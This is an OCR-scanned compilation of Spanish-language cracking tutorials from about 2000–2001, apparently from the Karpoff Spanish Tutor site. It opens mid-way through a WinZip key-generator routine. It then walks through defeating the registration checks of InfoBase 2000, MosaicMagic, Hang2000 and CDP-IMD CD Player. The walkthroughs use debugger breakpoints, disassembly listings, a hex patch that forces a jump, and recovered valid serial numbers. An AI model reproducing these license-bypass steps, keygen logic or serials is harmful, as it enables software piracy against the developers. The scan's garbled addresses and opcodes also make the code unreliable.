next x 


"sumamos h63 a los 4 primeros digitos registration* 
partel = partel + £h63 
partel = partel mod £<h10000 
le mmm 22 parte Henmmmmmmmnmen - 
for x = 1 to len(name) 
parte2 = parte2 + asc(mid$(name, x, 1)) * (x - 1) 
next x 
'concatenamos las 2 partes (cada parte es de 4 digitos) 
keypartel= string$(4 - len(cstr(hex(partel))), ''0'") + cstr(hex(partel)) 
keyparte2= string$(4 - len(cstr(hex(parte2))), ''0") + cstr(hex(parte2)) 
registration_key = keypartel + keyparte2 
end function 


(no disponibles,el webmaster de la pagina no pone cracks) 


kgwinzip80.exe - key generator winzip 8.0 (3105) 


kgwinzip.exe - key generator winzip 7.0-8.0 (3105) 


fácil, nooo ;)! espero haberme explicado bien. 


om ++ agradecimientos +f----- - 
karpoff, demian, black fenix, prOfesor x, numit_or, esiel 2, mr. crimson, mr. white, mr. green, tnt, wkt, kut y a todos los 
crackers del pasado, presente y futuro. 
idad dE resetea Henao - 


un saludo! 


+erOser'2000 
for the new millennium 


-=/W- your mind is the power -/WV=- 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


FEO geamas InfoBase 2000 v 1.0 


introducción 


hola amigos, de nuevo por aqui con otro tutorial mas, en el cual hablaremos de como encontrar un numero de 
serie para todos!!! jejeje !!! los programas de la empresa " bitlogic " los cuales vienen muy mal protegidos, ya 


sistema de protección, que viene a hechar a perder todo el programa, ya que si este es bueno, y la protección 
mala, !!!! que desperdicio de tiempo !!!! 


este programa que ocuparemos de ejemplo es de muy buena utilidad para todos aquellos: 


que necesitan un programa para almacenar todas sus citas, en un archivo con un format rich text, esta 
aplicación te permite avisarte de alguna cita que tengas con nueve tipos de alarmas, tambien tiene tres 
tipos de protecciones, y la opcion de encriptarlas para así prevenir que ojos no deseados vean sus citas 
y notas. 


en fin este es un pograma que le puede ayudar a organizarse un poco, con una minima configuración. 


analizamos el ejecutable con el file inspector y veamos la imagen y nos aparece que esta empaketado con aspack v 
1.02b, ok ya sabemos como esta todo este menjurgue !!!jejejej!!!!!.. 


hile msPEctor v3.5 - VIPERIK-FoR] 


o 


ahora analizemos el programa para ver que limitaciones tiene, al abrirlo lo primero que aparece es una ventana como 
esta: 


InfoBase 2000 


Version 1.0 


Development and Design by 
¡TEE Communications (c) 2000 


Ema Reecomébbitlogic co uk 


en la cual podemos ver que tiene dos opciones, una de activate y otra continue, de las cuales la de activate, si damos 
click, nos manda a otra ventana en la cual instertaremos un numero de serie falso para ver que nos da como resultado 
dando click en ok!: 


Activate Licence 


¡Warming 


como siempre, nos manda un mensaje de error, !!!! contact itee comunications blabla....... 


is 


ok!! ya vimos que esta protegido con aspack y 1.02b, y que se registra por medio de un serial, bueno entonces, como 


lo primero será ejecutar el programa otra vez y despues insertar un numero de serie fictisio como se muestra en 
la imagen de arriba, ya estando insertado el numero, damos control d y saltamos a nuestro querido y gran 
ponderado softice!!! en el cual pondremos el mas afamado y util de los breakpoints el bpx hmemcpy y volvemos 
a dar control d e inmediatamente damos click en el boton de ok!, saltaremos al softice y despues de ahi empieza 
la acción, busquemos el serial, tecleamos en la función 12 ''f12", hasta que lleguemos a esta parte del codigo que 
serian mas o menos 12 veces 


osos 
0050b2f7 e8d4bd f4ff call 00457000 < caemos aqui> 
S0b2fc 8b45 f8 mov eax,[ebp-08] 

50b2ff ba08b45000 mov edx,D0S50b400 

50b304 es3b8ceff call 0040344 


50b309 7417 jz 0050b322 


| AO: | 


recuerden que es muy importante, si te gusta el programa compralo !!!!, ya que ' hacen un gran esfuerzo los 
programadores '' para poner a disposicion de todos nosotros estos programas que hacen la vida mas facil, 


saludos a: 
e act mago 


e txeli (consuegro) :) 
e dek_oin 


saludos a todos ustedes que leen mis manuales. recuerden, no acepto pedidos de cracks!!!. 


nos vemos en el próximo tutorial amigos!, 


enjoy!!! 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 
Programa: | MosaicMagic | 


Cracker: AlamBike 01/ 01/2001 


introducción 


bien, este es un tutorial para los que, como yo, estamos un poco pez en el asunto pero sin embargo le hechamos 
un poco de vidilla y nos ponemos a trastear con las herramientas. 


para empezar decir que la dificultad es afrontable para todo el mundo y pronto vereis que esto del crack es 
directamente proporcional a las ganas de trabajo de los programadores, y en este caso se ve que el progamador 
tenia otras cosas más importantes que hacer. ;))) 


descargamos esta utilidad que sirve para que a partir de una foto, compare los rasgos y colores con un monton de fotos en 
una galeria dando como resultado una foto que se parece mucho a la primera pero realizada con la union de muchas fotos 
elegidas al azar de la galeria. 


buff menudo rollo, espero que sus abreis enterado, con lo que procederemos al ler paso. 


instalamos el programa y nos damos cuenta de que el progamador ha bloqueado el poder salvar y alguna que otra cosilla, 


con lo que buscamos una ventana de registro, cosa que aparece en la opcion help + register mosaic magic. 


comprobamos, no sin cierta sorna, que nos pide un unico serial, no una ventana con nombre y otra con n*serie, lo que nos 
lleva a pensar que la cosa es sencilla y seguramente exista un serial para todos ( o que este este formado por una 
combinacion fija, que no dependa de variables externas ). 


bueno pues ponemos algo como por ejemplo "kalimocho", y obtenemos un mensaje (con sonido y todo) de una ventana que 
nos dice algo asi como "you have not enterred the correct registation key". 


con esta información en la mano procederemos ... 


Vale , tenemos un programa, que pide un unico campo de serial y además nos aparece una ventana con un texto especifico 
al fallar en el registro. 


cargamos el w32dsm abrimos el fichero mosaicmagic.exe y una vez desensamblado de pulsamos sobrestr-ref, para buscar 
la "frase", como todas las frases que aparecen lo hacen por orden alfabético iremos al final de la ventana de frases y ... ahi 
esta "you have not enterred the correct"... ummm carnaza lista... veamos a donde nos lleva ... 


aparece el siguiente codigo 


* possible stringdata ref from data obj ->"key 1" 


| 
:0040845c 6834034700 push 00470234 
:00408461 68c0884700 push 004788c0 


* reference to: mfc42.mfc42:noname0167, 
ord: 1903h 


| 

:00408466 e8c93e0400 call 0044c334 
:0040846b 8bce mov ecx, esi 
:0040846d e88e000000 call 00408500 
:00408472 85c0 test eax, eax 
:00408474 6a00 push 00000000 
:00408476 6a00 push 00000000 
:00408478 7407 je 00408481 


* possible stringdata ref from data obj - 
>"thankyou for registerring mosaic " 
->"magic" 


| 
:0040847a 680c0a4700 push 00470a0c 
:0040847f eb05 jmp 00408486 


* referenced by a (u)nconditional or (c)onditional 
jump at address: 
|:00408478(c) 


-aparecemos aqui->> * possible stringdata ref 
from data obj ->"you have not enterred the 
correct " 

->"registration key." 


| 
:00408481 68d8094700 push 004709d8 


* referenced by a (u)nconditional or (c)onditional 
jump at address: 

|:0040847f(u) 

| 


* reference to: mfc42.mfc42: noname0012, 
ord: 04b0h 


| 
:00408486 e81f3b0400 call 0044bfaa 


tachan... caimos de lleno, unas líneas mas arriba nos dice "thankyou for registerring moscaic", pero si nos da las gracias y 
todo..., veamos que hace antes... tenemos un test eax, eax y si somos malos pues nos dan berzas, con lo que si miramos un 
poco la rutina de comprobacion... , para ello nos pondremos sobre :0040846d e88e000000 call 00408500y pulsamos sobre el 
boton call para caer en el siguiente codigo. 


* referenced by a call at addresses: 

|:0040840b , :0040846d , :00409020 , :004099f2 
, :0040b046 

| <-- interesante llama a esto desde 5 sitios, 
señores estamos en la rutina de chequeo de 
clave... 


:00408500 642100000000 mov eax, dword ptr 
fs:[00000000] 

:00408506 6aff push TF 

:00408508 6878d54400 push 0044d578 
:0040850d 50 push eax 

:0040850e 64892500000000 mov dword ptr 
fs:[00000000], esp 

:00408515 83ec54 sub esp, 00000054 
:00408518 80442400 lea eax, dword ptr [esp] 
:0040851c 56 push esi 

:0040851d 57 push edi 

:0040851e 6200 push 00000000 


* possible stringdata ref from data obj ->"key 1" 


| 

:00408520 6834024700 push 00470334 
:00408525 68c0884700 push 004788c0 
:0040852a 50 push eax 


* reference to: mfc42.mfc42: noname0168, 
ord: Odc2h 


| 

:0040852b e80a3e0400 call 0044c33a 
:00408530 8b742408 mov esi, dword ptr 
[esp+08] 

:00408534 8b56f8 mov edx, dword ptr [esi-08] 
:00408537 83fa14 cmp edx, 00000014 <-- 
compara la longitud de lo que metemos con 14 
(20 en decimal) la clave tiene 20 caracteres. 
:0040853a 7424 je 00408560 


unas líneas mas abajo 


:004085af C7442464fffFfFFff mov [esp+641, FEF 


* reference to: mfc42.ordinal: 0320, ord:0320h 


| 

:004085b7 e84a380400 call 0044be06 
:004085bc 8b4c245c mov ecx, dword ptr 
[esp+5c] 

:004085C0 5f pop edi 

:004085c1 b801000000 mov eax, 00000001 <<-- 
todo ok ;) mueve 1 a eax y termina... 
:004085c6 5e pop esi 

:004085c7 6489000000000 mov dword ptr 
fs:[00000000], ecx 

:004085ce 83c460 add esp, 00000060 


:004085d1 c3 ret 


y si cambiaramos la linea :0040853a 7424 je 00408560 por jmp 004085b7 :? 


como no estoy muy versado en ensamblador, y no se como codificar la instrucción, pues lo que hago es arrancar el propio 
depurador del w32dasm 
para ello voy a la opcion debug + load process y despues load, con lo que se abren varias ventanas. 


nos vamos a la linea :0040853a 7424 je 00408560 en la ventana del listado muerto y pulsamos f2 para poner un break 
point y corremos el programa en el boton f9-run. 


se abre una nueva ventana que es el programa a destripar, elegimos registrarnos y aparecemos en el codigo de breakpoint... 


bueno ahora le damos al boton patch code y se abre una ventana que pone w32dasm code patcher, aparece la linea del. y 
abajo una caja de dialogo que nos invita a poer el codigo a cambiar , con lo que raudos pondremos jmp 004085b7 y al 
darle al enter, nos aparece el codigo parcheado que es eb7b 


eso es lo que hay que sustituir, 
:0040853a 7424 je 00408560 
por 
:0040853a eb7b jmp 004085b7 


con un editor hexadecimal buscaremos la cadena 83fa14 7424 8d4c2408 y la sustituimos por 83fa14 eb7b 8d4c2408 y 
tendremos el programa funcionando al 100%. 


22 aprox. estudio del código y creación de un n2 
valido 


bueno, como en realidad no me ha llevado mucho tiempo destriparlo, pues pienso que lo interesante esta vez es la obtencion 
por nuestros propios medios de un n£ de serial valido y funcional,de esa forma ademas de aprender algo sobre como 
funciona el asembler, nos distinguiremos con la maxima del cracker que es dejar los ficheros sin alterar.. 


antes de entrar a saco en el codigo, me gustaria llegar al meollo usando otra de las herramientas que un cracker debe tener 
a mano y es el trw2000, en realidad me gusta mucho mas usar este programa que sice puesto que no tienes que configurar 
nada, y lo usas solo cuando quieres sin necesidad de reiniciar el equipo. 


además a los crackers les gustara dos de las nuevas instrucciones que incorpora y que mejoran mucho el analisis del 
programa-victima y son pmodule y suspend. 


bueno, pmodule es una maravilla siempre que el programa llame a otra ventana, en vez de buscar el handle y despues poner 
un breakpoint en el mismo, pmodule hace todo eso por nosotros, en realidad parará en el momento de volver a la ventana 
principal, y suspend lo que hace es parar la ejecucion del programa, dandonos libertad de movimiento pudiendo usar 
cualquier otro programa de windows para por ejemplo, buscar informacion, consultar manuales etc... 


como muestra un boton, cargamos el trw2000 y arrastramos el icono del mosaicmagic al campo que nos pide el fichero a 
cargar, le damos load y f5 para que se ejecute. 


acto seguido nos intentamos registrar y cuando pide el codigo le damos al control+n y aparecemos en la pantalla del 
trw2000, ponemos pmodule y enter, se cierra la pantalla y volvemos a la ventana de registro, una vez introducido un serial 
invalido por ejemplo "hola", tachan!! aparecemos en la rutina de comprobacion (a que es facil de esta forma ;))) ), bien 
estudiemos pues el codigo... 


* referenced by a call at addresses: 

|:0040840b , :0040846d , :00409020 , :004099f2 , :0040b046 
|->esto nos indica desde que puntos llama a la rutina 
:00408500 642100000000 mov eax, dword ptr fs:[00000000] 
:00408506 6aff push TF 


:00408508 6878d54400 push 0044d578 

:0040850d 50 push eax 

:0040850e 64892500000000 mov dword ptr fs:[00000000], esp 
:00408515 83ec54 sub esp, 00000054 

:00408518 80442400 lea eax, dword ptr [esp] 

:0040851c 56 push esi 

:0040851d 57 push edi 

:0040851e 6200 push 00000000 


* possible stringdata ref from data obj ->"key 1" 


| 

:00408520 6834024700 push 00470334 
:00408525 68c0884700 push 004'788c0 
:0040852a 50 push eax 


* reference to: mfc42.ordinal:Odc2, ord:Odc2h 


| 

:0040852b e80a3e0400 call 0044c33a 

:00408530 8b742408 mov esi, dword ptr [esp+08] 
:00408534 8b56f8 mov edx, dword ptr [esi-08] 
:00408537 83fa14 cmp edx, 00000014 

:0040853a 74724 je 00408560 


*** hasta este punto basicamente comprueba la longitud de los caracteres y si 
es igual a 14 (20 en decimal) nos manda a 00408560 si no continuamos en las 
siguiente lineas por si somos chicos malos 
AS 

* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408520(c) 


| 
:0040853c 8d4c2408 lea ecx, dword ptr [esp+08] 
:00408540 C7442464*fffffff mov [esp+64], TF 


* reference to: mfc42.ordinal:0320, ord:0320h 
| 
:00408548 e8b9380400 call 0044be06 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:0040853a(u) 


| 

:0040854d 5f pop edi 

:0040854e 33c0 xor eax, eax 

:00408550 5e pop esi 

:00408551 8b4c2454 mov ecx, dword ptr [esp+54] 

:00408555 64890d00000000 mov dword ptr fs:[00000000], ecx 
:0040855c 830460 add esp, 00000060 

:0040855f c3 ret 


ES 


:00408560 53 push ebx 

:00408561 33c0 xor eax, eax 

:00408563 8d4c2410 lea ecx, dword ptr [esp+10] 
:00408567 bf14000000 mov edi, 00000014 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408570(c) 


| 
:0040856c Ofbe1c30 movsx ebx, byte ptr [eax+esi] 
¡¡¡ importante, mueve el contenido del caracter que apunta eax+esi a ebx pero 
con signo!!! 
esto quiere decir que si eax+esi = 31 en ebx guarda 00000031 
pero si eax+esi = 80 en ebx guarda ffFF8O 


:00408570 40 inc eax 

:00408571 8919 mov dword ptr [ecx], ebx 
:00408573 3bc2 cmp eax, edx 

:00408575 7c02 jl 00408579 

:00408577 33c0 xor eax, eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408575(c) 


| 

:00408579 83c104 add ecx, 00000004 
:0040857c 4f dec edi 

:0040857d 75ed jne 0040856c 

:0040857f 33c9 xor ecx, ecx 

:00408581 8d742410 lea esi, dword ptr [esp+10] 
:00408585 5b pop ebx 


el bloque de arriba lo que hace es pasar los caracteres que le mandamos por la 
caja de dialogo que estan en la posicion que apunta eax y los transporta a otra 
zona de la memoria apuntada por esp, pero aqui lo que hace es moverlos con 
signo, esto es importante puesto que la rutina comprobara si el numero tenia o 
no signo... (si esta entre 80 y ff ) (128-255 en decimal, esto es que los 
caracteres menores de 128 en codigo ascii seran rechazados...) 


el bloque de abajo en realidad es el meollo de toda la rutina de comprobacion, 
asi que lo describire lo mejor que pueda... 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:004085a9(c) 


| 

:00408586 8bc1 mov eax, ecx 

:00408588 bf05000000 mov edi, 00000005 

:0040858d 99 cdq 

:0040858e f7ff idiv edi 

esto guardará en edx el resto de dividir el valor entre 5 que será un numero 
correlativo del O al 4 


:00408590 8b06 mov eax, dword ptr [esi] 
mueve a eax uno de los caracteres de la clave que hemos puesto 


:00408592 2bc2 sub eax, edx 
le resta a eax (el caracter) el valor del resto que sera correlativa 0-1-2-3-4-0-1-2- 
3-4... 


:00408594 2503000080 and eax, 80000003 

hace la operacion and 80000003 al caracter resultante. 

esto en la practica es que sea cualquier numero que sea solo tiene en cuenta si 
el primer y segundo digito binario es un 1 y si el ultimo digito binario es uno, y 
no le importa que sean los demas, pueden ser unos o ceros que el valor de eax 
tendra O por el medio... 


ejemplo si el caracter es 31 (corresponde con el digito 1 en ascii) 


0000 0000 0000 0000 0000 0000 0011 0001 ->> 31 en hex ->> 49 en 
decimal ->> "1" en ascii 
and 1000 0000 0000 0000 0000 0000 0000 0011 -->> 80000003 


0000 0000 0000 0000 0000 0000 0000 0001 ->> 1 sin signo 
si el caracter por el contrario es 80 


1000 0000 0000 0000 0000 0000 0000 0100 -->> 84 en hex -->>132 
en decimal 
and 1000 0000 0000 0000 0000 0000 0000 0011 -->> 80000003 


1000 0000 0000 0000 0000 0000 0000 0000 -->> 0 pero con signo 


:00408599 7905 ¡ns 00408520 

esto lo que hace es comprobar si el valor resultado del anterior and tiene signo, 
esto es si por lo menos el ultimo digito binario es un 1 si no lo es ... ¡a la 
mierda! que diria d.camilo ;))) 


:0040859b 48 dec eax 
le resta 1 a eax 


:0040859c 83c8fc or eax, fffffffc 
le hace un or fffffffc a eax 
ejemplo si el caracter es (84 -1 ) = 83 


1111 1111 1111 1111 1111 1111 1100 -->> fffffffc en hex 
or 1000 0000 0000 0000 0000 0000 0011 --->> 83 en hex 


1111 1111 1111 1111 1111 1111 1111 --->> ff en hex 


:0040859%f 40 inc eax 
le vuelve a sumar 1 a eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408599(c) 


| 
:00408520 759a ¡ne 0040853c 
sino es 0 ¡a la mierda!... 


con estas 4 operaciones lo que hace es comprobar que ademas de signo, el 
numero acabe en xx00 binario 
esto nos da 4 posibilidades 


0000 
->0 
0100 
->4 
1000 
->8 
1100 
->C 


:00408532 41 inc ecx 

:004085a3 83c604 add esi, 00000004 

:00408526 83f914 cmp ecx, 00000014 

:004085a9 7cdb jl 00408586 

repite todo hasta comprobar los 20 caracteres, pero los patrones los hace de 5 
en cinco con lo que si tenemos los 5 primeros bien, solo resta repetirlos 4 veces 
mas ;)) 


:004085ab 8d4c2408 lea ecx, dword ptr [esp+08] 
:004085af C7442464ffffffff mov [esp+641, FF 


* reference to: mfc42.ordinal:0320, ord:0320h 


| 

:004085b7 e84a380400 call 0044be06 

:004085bc 8b4c245c mov ecx, dword ptr [esp+5c] 

:004085C0 5f pop edi 

:004085c1 b801000000 mov eax, 00000001 

:004085c6 5e pop esi 

:004085c7 64890d00000000 mov dword ptr fs:[O0000000], ecx 
:004085ce 83c460 add esp, 00000060 

:004085d1 c3 ret 


lo de arriba es si eres buen chico y todo fue ok hace unas cosas y devuelve 1 a 
eax antes de salir para indicar a la rutina que llamo que todo fue bien. 


una vez entendido el funcionamiento solo nos queda poner caracteres mayores 
que 128 en ascii que coincidan con los criterios, el problema es que windows no 
transforma esos caracteres a su correspondiente ascii si son mayores que 128 


con lo que nos queda probar numeros para ello desbilitamos los demas 
breakpoints con bd * en el trw2000 y ponemos un bpx en 


--> :0040856c Ofbe1c30 movsx ebx, byte ptr [eax+esi] 
con la orden bpx 40856c 


le damos a f5 y cuando nos pida el serial empezamos a poner caracteres con 
alt+129, alt4+-130, alt+-131... alt+148 


bop! aparecemos en trw2000 y al ver eax con d eax salen los numeritos, 
entonces.solo resta hacer un poco de memoria... 


buscamos un numero hex que acabe en 0 4 8 o c y sus 4 numeros siguentes en 
hexa... hummm vemos algo interesante... 


e4 = 132 en ascii 
e5 = 134 en ascii 
e6 = 145 en ascii 
e7 = 135 en ascii 
e8 = 138 en ascii 


ahi esta la cadena !!! 

bueno impacientes, nos vamos a la pantalla de registro y ponemos... 
alt+132 alt+134 alt+145 alt+135 alt+138 

a mi depues de ponerlo me queda en lo siguiente ¿ásecé 


despues selecionamos bloque copiamos y pegamos 4 veces mas para formar la 
clave que es 


ádoeceáareccidreccidrece 


bueno supongo que hay muchos mas caracteres que son validos pero yo encontre estos antes, es cuestion de probar... 


agradezco a los creadores del programa por que nos hacen muy felices a los que nos iniciamos en ser capaces de parchear 
en 5 minutos sus creaciones. 


y comprender sus "complejos" sistemas de proteccion en cosa de hora y media - dos horas 


agradezco a la gente del canal del irc crackers por la ayuda prestada a la hora de explicarme para que servia el cdq, gracias 
seroscuro ;)) 


agradezco a los de k-for por motivarme a escribir el tutorial y dejarme un sitio para publicar el mismo. 


pero sobre todo os agradezco a vosotros el haber perdido el tiempo en la lectura del mismo, 
espero os sirva de algo. si es asi agradeceria que me lo dijerais alambike 


animo a todo el aficionado a intentar elaborar un tutorial y enviarlo, que seguro que sirve de ayuda a mucha gente... 


por ultimo pero no por ello menos importante, es decir que no me hago responsable de lo que la gente haga 
con estos contenidos y que si alguien quiere usar un programa debe pagarlo, lo contrario podria constituir un 
delito. 
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Karpoff Spanish Tutor 2001 
Hang2000 v1.3.2 


Pr 
Descripción: | Hang2000 es un juego sencillo basado en el clásico juego del ahorcado 


INTRODUCCIÓN 


hola amigos, presento mi décimo octavo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 
cosas. en este tutorial volveremos a usar el softice. si no lo tienes instalado puedes bajártelo en 
www.crackstore.com . asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo 


decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


vuelve el efecto "ahorcado", pruébalo y seguro que no te decepcionará 


hang2000 es un juego sencillo basado en el clásico juego del ahorcado. recuerda esos momentos de niño en los 
que jugaste tus primeras partidas al ahorcado. un juego que desde el primer momento conseguirá tenerte delante 
del ordenador tenga la edad que tengas. las letras las podrás escoger usando el ratón o el teclado. las palabras 
las podrás seleccionar entre docenas de categorías ya incluidas en el programa. además, podrás añadir tus 
propias palabras, o hasta incluir el vocabulario que has dado ese mismo día en clase, y así poder repasar todo el 
vocabulario. el programa te informará a pequeña escala de aspectos literarios o culturales de las palabras o 
frases que resulten del juego, de esta manera se consigue culturizar al jugador mientras se divierte en el juego. 
hang2000 tiene un interfaz repleto de colores que conseguirá mantener a los niños interesados en el juego. un 
juego educativo al completo con efectos de sonido digitalizados, gráficos no violentos, y mucha diversión por 
descubrir. 


comentario sacado desde softonic. 


lo que nos interesa...el programa es shareware con libre uso de 14 días, por lo que si quieres seguir usándolo 
después de ese periódo deberás pagar la suma de us$20. 


contamos con softice :) ... 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos hang2000 


abrimos el programa, luego nos vamos a file > register... y nos encontraremos con la caja de registro, la que nos pide los 
siguientes datos: 


name: 
serial 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


sorry! registraton not accepted. please re-enter the required information exactly as 


received. 


a continuación... cerramos hang2000 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos hang2000 y vamos directamente a la caja de registro en donde introducimos nuestro nombre, y 
cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es presionar control-+d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez y f12 8 veces para caer aquí... 


:00406a22 
:00406a26 
:00406a28 
:00406a29 
:00406a2e 
:00406a2f 
:00406a31 
:00406a35 
:00406a3c 
:00406a3d 
:00406a3e 
:00406a43 
:00406a46 
:00406a%a 
:00406a50 


8d54240c 

6ale 

52 

68ed030000 

53 

ffd6 

8d444240c 
8d8c248c000000 
50 

51 

e88d020000 
830408 
66340100 
0f85a7000000 
8d494240c010000 


lea 
push 
push 
push 
push 
Call 
lea 
lea 
push 
push 
Call 
add 
cmp 
jnz 
lea 


edx, [esp+0c] <-- caemos aquí, seguimos con f10 
le 

edx 

000003ed 

ebx 

esi 

eax, [esp+0c] 

ecx, [esp+0000008c] 

eax <-- d eax =nuestro registro falso d ecx =nombre 
ecx <-- lo mismo de arriba 

00406cd0 <-- aquí nos paramos y entramos con f8 


esp, 08 

ax, 0001 

00406a£7 <-- salto bueno, comprobable con r fl z 
edx, [esp+0000010c] 


el salto bueno al que me refiero es el que te manda a registro aceptado obviamente, lo cual puedes comprobar invirtiendo 
el salto con el comando r fl z y luego presionando f5 para ver el resultado. 


luego de presionar f8 en la llamada o call 00406a3e, caeremos aquí... 


:00406cd0 8b4c2404 


:00406cd4 
:00406cda 
:00406cde 
:00406cdf 
:00406ce0 
:00406ce5 
:00406ce8 
:00406ceb 
:00406ced 
:00406cf3 


:00406cf4 
:00406cf£5 
:00406cf6 
:00406cfd 
:00406d01 
:00406d03 


8lec80000000 
84442400 

50 

51 
e8cbfeffff 
83c408 
6685c0 

7507 
81c480000000 
(036) 


53 

56 
8bb42490000000 
84442408 

8al0 

8ale 


sub 
lea 
push 
push 
Call 
add 
test 
jnz 
add 
ret 


push 
push 
mov 
lea 
mov 
mov 


ecx, [esp+04] <- caemos aquí, seguimos con f10 
esp, 00000080 

eax, [esp+00] 

eax 

ecx 

00406bb0 

esp,08 

ax, ax 

00406c£4 <- nos dejamos llevar por este salto 
esp, 00000080 


ebx <-- caemos aquí, seguimos con f10 
esi 

esi, [esp+00000090] 

eax, [esp+08] 

dl, [eax]<-- d eax =registro válido :) 
dl, [esi] 


al colocar d eax en el mov 00406d01 tendremos nuestro código de registro válido, en mi caso la caja quedaría así... 


name: act mago 


serial* Ijbepc-13660 


le damos click a register y... 


nota: 


registration accepted. thank you very much. 


1. el registro que da guardado en x:1windows en un archivo llamado wh2k.dat . 


2. al desensamblar el programa se ve esta cadena: "ljbepc- ", jejeje :), que protección más mala... :) 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


e profesor x 
e [dek_oin ] 
e txeli 

e Kuato_thor 
e Crkviz 

e code_mex 
e metamorfer 
e txotxo 

e turbop 


e karpoff http:/ / welcome.to/karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http://www. finspec.swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


22/12/00 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


CDP - IMD CD Player v1.02 


Protección: Serial 
Descripción: Programa musical 


introducción 


hola amigos, presento mi décimo noveno tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 
cosas. en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . 
asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo decir : este texto ha sido 
escrito sólo con propósitos educacionales. 


comentario del programa 


e Cd player para windows. 

e Opciones: 
o multiples contadores y referencias en pantalla. 
o acceso inmediato a las pistas mediante caja-track. 
o acceso inmediato a las pistas mediante menz. 
o barra de acceso a cualquier parte de la pista. 
o avanze y retroceso con inercia. 
o múltiples opciones. 
o modo shade (mini-player). 
o en dos idiomas (inglis/ espagol). 
o buen aspecto. 
o gran facilidad de uso. 


lo que nos interesa...el programa es shareware con libre uso de 30 días y para registrarse hay que pagar $8 us. 


contamos con softice :) ... 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en bordland delphi 3.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos cdp-imd cd player v1.02 


abrimos el programa, nos vamos al botón ? (sobre...) y luego presionamos el botón registrarse, y ahora estamos en la caja 
de registro la que nos pide los siguientes datos: 


nombre: 
número de serie: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a registrarse y por supuesto que el programa 
no aceptará el código de registro y nos mostrará un mensaje como este... 


registro inválido. 


a continuación... cerramos cdp-imd cd player v1.02 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos cdp-imd cd player y vamos directamente a la caja de registro en donde introducimos nuestro 
nombre, y cualquier código de registro. todavía no damos click en registrarse ; lo que ahora debemos hacer es presionar 
control+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a registrarse y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez y f12 11 veces para caer aquí... 


:0045ce77 8b45£8 mov ax, [ebp-08]<-- caemos aquí, seguimos con f10 
:0045ce7a 8d55bfc lea edx, [ebp-04] 

:0045ce7d e8766£0000 call 00463df8 

:0045ce82 8d55f4 lea edx, [ebp-0c] 

:0045ce85 a1l44894700 mov eax, [00478944] 

:0045ce8a 8b80f0020000 mov eax, [eax+000002£0] 

:0045ce90 e873d4fcff Call 0042a308 

:0045ce95 8b55f4 mov edx, [ebp-0c] 

:0045ce98 8b45fc mov ax, [ebp-04] <-- d edx =nuestro registro falso 
:0045ce9b e8ec6ffaff call 00403e8c <-- d eax = nuestro registro válido 
:0045cea0 0f8503010000 jnz 0045cfa9 <-- salto bueno, comprobable con r fl z 
:0045cea6 8b45fc mov eax, [ebp-04] 


al colocar d eax en la call 0045ce9b tendremos nuestro código de registro válido, en mi caso la caja quedaría así... 
name: act mago 
serial? 19d111111111111 


le damos click a registrarse y... 


registro correcto. 


nota: por lo que pude ver también se puede registrar el programa infotel v3.31.00 de la misma compañia usando el 
método que acabo de mostrar. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


e profesor x 

e [dek_oin ] gracias por el dato :) 
e txeli 

e Kuato_thor 

e Crkviz 

e code_mex 

e metamorfer 

e txotxo 

e raziel 

e turbop 


e karpoff http://welcome.to/karpoff 


